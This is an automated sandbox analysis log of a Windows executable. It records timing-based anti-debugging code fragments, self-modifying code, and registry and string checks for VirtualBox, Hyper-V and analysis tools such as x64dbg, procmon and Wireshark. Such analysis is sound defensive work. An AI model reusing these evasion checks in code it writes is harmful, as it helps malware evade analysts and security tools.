Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 74F1016 second address: 74F1037 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6D94B29701h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ecx, esi 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 mov si, di 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 74F1037 second address: 74F103C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 74F103C second address: 74F1042 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 74F1042 second address: 74F1046 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 74F1046 second address: 74F1062 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esi+0Ch], eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F6D94B296FFh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 74F1062 second address: 74F1087 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, 40F65481h 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov edx, 756006ECh 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F6D94F51083h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 74F1087 second address: 74F109F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6D94B29704h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 74F109F second address: 74F10A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 74F10A3 second address: 74F10BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, 00000000h 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 mov edi, 1B14493Ch 0x00000015 push edi 0x00000016 pop ecx 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 74F10BB second address: 74F10DE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, 67AF0CC3h 0x00000008 mov cx, B21Fh 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f lock cmpxchg dword ptr [edx], ecx 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F6D94F5107Ch 0x0000001c rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 74F10DE second address: 74F10ED instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6D94B296FBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 74F10ED second address: 74F111A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6D94F51089h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edi 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F6D94F5107Dh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 74F111A second address: 74F1145 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 mov dl, DFh 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a test eax, eax 0x0000000c pushad 0x0000000d mov di, si 0x00000010 jmp 00007F6D94B296FEh 0x00000015 popad 0x00000016 jne 00007F6E02BB7C99h 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 74F1145 second address: 74F1149 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 74F1149 second address: 74F114F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 74F114F second address: 74F1155 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 74F1155 second address: 74F1159 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 74F1159 second address: 74F116E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov edx, dword ptr [ebp+08h] 0x0000000b pushad 0x0000000c popad 0x0000000d mov eax, dword ptr [esi] 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 74F116E second address: 74F1172 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 74F1172 second address: 74F1178 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 74F1178 second address: 74F118A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop edx 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [edx], eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push esi 0x0000000e pop edi 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 74F12C6 second address: 74F12E3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6D94F51089h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 74F12E3 second address: 74F12F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6D94B296FCh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 74F12F3 second address: 74F1311 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esi+1Ch] 0x0000000b pushad 0x0000000c mov cl, bl 0x0000000e mov dh, ah 0x00000010 popad 0x00000011 mov dword ptr [edx+1Ch], eax 0x00000014 pushad 0x00000015 mov edx, 0EB22672h 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 74F1311 second address: 74F1315 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 74F1315 second address: 74F13A5 instructions: 0x00000000 rdtsc 0x00000002 mov eax, ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [esi+20h] 0x0000000a pushad 0x0000000b movsx ebx, si 0x0000000e pushfd 0x0000000f jmp 00007F6D94F51088h 0x00000014 or al, FFFFFFB8h 0x00000017 jmp 00007F6D94F5107Bh 0x0000001c popfd 0x0000001d popad 0x0000001e mov dword ptr [edx+20h], eax 0x00000021 pushad 0x00000022 movzx eax, di 0x00000025 call 00007F6D94F51081h 0x0000002a push esi 0x0000002b pop edi 0x0000002c pop esi 0x0000002d popad 0x0000002e mov eax, dword ptr [esi+24h] 0x00000031 pushad 0x00000032 pushfd 0x00000033 jmp 00007F6D94F51089h 0x00000038 sbb eax, 64A094B6h 0x0000003e jmp 00007F6D94F51081h 0x00000043 popfd 0x00000044 push eax 0x00000045 push edx 0x00000046 mov ecx, 43051AFDh 0x0000004b rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 74F13A5 second address: 74F142E instructions: 0x00000000 rdtsc 0x00000002 call 00007F6D94B296FAh 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov dword ptr [edx+24h], eax 0x0000000e jmp 00007F6D94B29701h 0x00000013 mov eax, dword ptr [esi+28h] 0x00000016 jmp 00007F6D94B296FEh 0x0000001b mov dword ptr [edx+28h], eax 0x0000001e jmp 00007F6D94B29700h 0x00000023 mov ecx, dword ptr [esi+2Ch] 0x00000026 pushad 0x00000027 mov dh, al 0x00000029 jmp 00007F6D94B29703h 0x0000002e popad 0x0000002f mov dword ptr [edx+2Ch], ecx 0x00000032 pushad 0x00000033 push eax 0x00000034 mov cx, di 0x00000037 pop edx 0x00000038 mov edi, esi 0x0000003a popad 0x0000003b mov ax, word ptr [esi+30h] 0x0000003f push eax 0x00000040 push edx 0x00000041 jmp 00007F6D94B29705h 0x00000046 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 74F142E second address: 74F14A5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 mov di, A240h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov word ptr [edx+30h], ax 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007F6D94F51085h 0x00000017 adc esi, 12834646h 0x0000001d jmp 00007F6D94F51081h 0x00000022 popfd 0x00000023 pushad 0x00000024 call 00007F6D94F5107Eh 0x00000029 pop esi 0x0000002a mov esi, ebx 0x0000002c popad 0x0000002d popad 0x0000002e mov ax, word ptr [esi+32h] 0x00000032 jmp 00007F6D94F5107Dh 0x00000037 mov word ptr [edx+32h], ax 0x0000003b push eax 0x0000003c push edx 0x0000003d jmp 00007F6D94F5107Dh 0x00000042 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 74F14A5 second address: 74F14B9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, edx 0x00000005 mov si, bx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [esi+34h] 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 74F14B9 second address: 74F14BD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 74F14BD second address: 74F14C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 74F14C3 second address: 74F14ED instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx ebx, si 0x00000006 mov edx, eax 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [edx+34h], eax 0x0000000e pushad 0x0000000f movzx eax, dx 0x00000012 mov edi, 6F5EC2D8h 0x00000017 popad 0x00000018 test ecx, 00000700h 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007F6D94F5107Ah 0x00000025 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 74F14ED second address: 74F14F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 74F14F3 second address: 74F14F7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 74F15DE second address: 74F15E4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 7540B7E second address: 7540B95 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6D94F51083h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 7540B95 second address: 7540BC1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 jmp 00007F6D94B29702h 0x0000000e mov dword ptr [esp], ebp 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F6D94B296FAh 0x0000001a rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 7540BC1 second address: 7540BC7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 7540BC7 second address: 7540BD8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6D94B296FDh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 74E0719 second address: 74E0729 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6D94F5107Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 74E0729 second address: 74E072D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 74E072D second address: 74E074A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a mov cx, 0B79h 0x0000000e mov dl, cl 0x00000010 popad 0x00000011 mov dword ptr [esp], ebp 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 movzx ecx, di 0x0000001a mov bl, 0Ah 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 74E074A second address: 74E0750 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 74E0750 second address: 74E0754 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 748001B second address: 748007F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, dx 0x00000006 mov bx, FAD6h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push esi 0x0000000e pushad 0x0000000f call 00007F6D94B29708h 0x00000014 movzx eax, di 0x00000017 pop edx 0x00000018 call 00007F6D94B296FCh 0x0000001d mov di, si 0x00000020 pop eax 0x00000021 popad 0x00000022 mov dword ptr [esp], ebp 0x00000025 jmp 00007F6D94B296FDh 0x0000002a mov ebp, esp 0x0000002c push eax 0x0000002d push edx 0x0000002e pushad 0x0000002f push ebx 0x00000030 pop esi 0x00000031 call 00007F6D94B296FFh 0x00000036 pop ecx 0x00000037 popad 0x00000038 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 748007F second address: 7480085 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 7480085 second address: 7480089 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 748074D second address: 7480778 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jmp 00007F6D94F5107Bh 0x0000000d xchg eax, ebp 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F6D94F51085h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 7480778 second address: 7480795 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6D94B29701h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 7480795 second address: 7480799 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 7480799 second address: 748079D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 748079D second address: 74807A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 74807A3 second address: 74807D8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F6D94B29700h 0x00000008 jmp 00007F6D94B29702h 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pop ebp 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 mov ax, bx 0x00000017 mov ebx, 1B63029Ch 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 7480BB0 second address: 7480BC0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6D94F5107Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 7480BC0 second address: 7480C0D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6D94B296FBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov eax, edx 0x00000011 pushfd 0x00000012 jmp 00007F6D94B29707h 0x00000017 xor ch, 0000003Eh 0x0000001a jmp 00007F6D94B29709h 0x0000001f popfd 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 7480C0D second address: 7480C13 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 7480C13 second address: 7480C17 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 7480C17 second address: 7480CBA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a mov di, cx 0x0000000d jmp 00007F6D94F51080h 0x00000012 popad 0x00000013 xchg eax, ebp 0x00000014 pushad 0x00000015 pushfd 0x00000016 jmp 00007F6D94F5107Eh 0x0000001b jmp 00007F6D94F51085h 0x00000020 popfd 0x00000021 pushfd 0x00000022 jmp 00007F6D94F51080h 0x00000027 sub ax, 2EF8h 0x0000002c jmp 00007F6D94F5107Bh 0x00000031 popfd 0x00000032 popad 0x00000033 mov ebp, esp 0x00000035 jmp 00007F6D94F51086h 0x0000003a pop ebp 0x0000003b push eax 0x0000003c push edx 0x0000003d pushad 0x0000003e jmp 00007F6D94F5107Dh 0x00000043 call 00007F6D94F51080h 0x00000048 pop eax 0x00000049 popad 0x0000004a rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 74D0B35 second address: 74D0B3B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 74D0B3B second address: 74D0B3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 74D0B3F second address: 74D0B67 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 jmp 00007F6D94B29706h 0x0000000e mov dword ptr [esp], ebp 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 74D0B67 second address: 74D0B6D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 74D0B6D second address: 74D0B73 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 74D0B73 second address: 74D0B77 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 74B0073 second address: 74B0077 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 74B0077 second address: 74B007B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 74B007B second address: 74B0081 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 74B0081 second address: 74B0087 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRDTSC instruction interceptor: First address: 74B0087 second address: 74B008B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Tries to evade debugger and weak emulator (self modifying code)
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeSpecial instruction interceptor: First address: E6DB39 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeSpecial instruction interceptor: First address: E6DC48 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeSpecial instruction interceptor: First address: 100A141 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeSpecial instruction interceptor: First address: 1008769 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeSpecial instruction interceptor: First address: 101BB83 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeSpecial instruction interceptor: First address: 109CE31 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeCode function: 0_2_00A39980 rdtsc 0_2_00A39980
Source: C:\Users\user\Desktop\oJkvQZYkrx.exe TID: 1212Thread sleep time: -30000s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeCode function: 0_2_0085255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,FindFirstFileW,FindNextFileW,K32EnumProcesses,0_2_0085255D
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeCode function: 0_2_008529FF FindFirstFileA,RegOpenKeyExA,CharUpperA,CreateToolhelp32Snapshot,QueryFullProcessImageNameA,CloseHandle,CreateToolhelp32Snapshot,CloseHandle,0_2_008529FF
Source: C:\Users\user\Desktop\oJkvQZYkrx.exeCode function: 0_2_0085255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,FindFirstFileW,FindNextFileW,K32EnumProcesses,0_2_0085255D
Source: oJkvQZYkrx.exe, oJkvQZYkrx.exe, 00000000.00000002.1629046308.0000000000FEB000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: oJkvQZYkrx.exe, 00000000.00000003.1522990621.0000000001B44000.00000004.00000020.00020000.00000000.sdmp, oJkvQZYkrx.exe, 00000000.00000003.1522517125.0000000001B41000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllV
Source: oJkvQZYkrx.exe, 00000000.00000003.1493474678.000000000769F000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: SYSTEM\ControlSet001\Services\VBoxSF
Source: oJkvQZYkrx.exeBinary or memory string: Hyper-V RAW
Source: oJkvQZYkrx.exe, 00000000.00000003.1493474678.000000000769F000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: SYSINTERNALSNum_processorNum_ramnameallfreedriversNum_displaysresolution_xresolution_y\*recent_filesprocessesuptime_minutesC:\Windows\System32\VBox*.dll01vbox_firstSYSTEM\ControlSet001\Services\VBoxSFvbox_secondC:\USERS\PUBLIC\public_checkWINDBG.EXEdbgwireshark.exeprocmon.exex64dbg.exeida.exedbg_secdbg_thirdyadroinstalled_appsSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallSOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall%d%s\%sDisplayNameapp_nameindexCreateToolhelp32Snapshot failed.
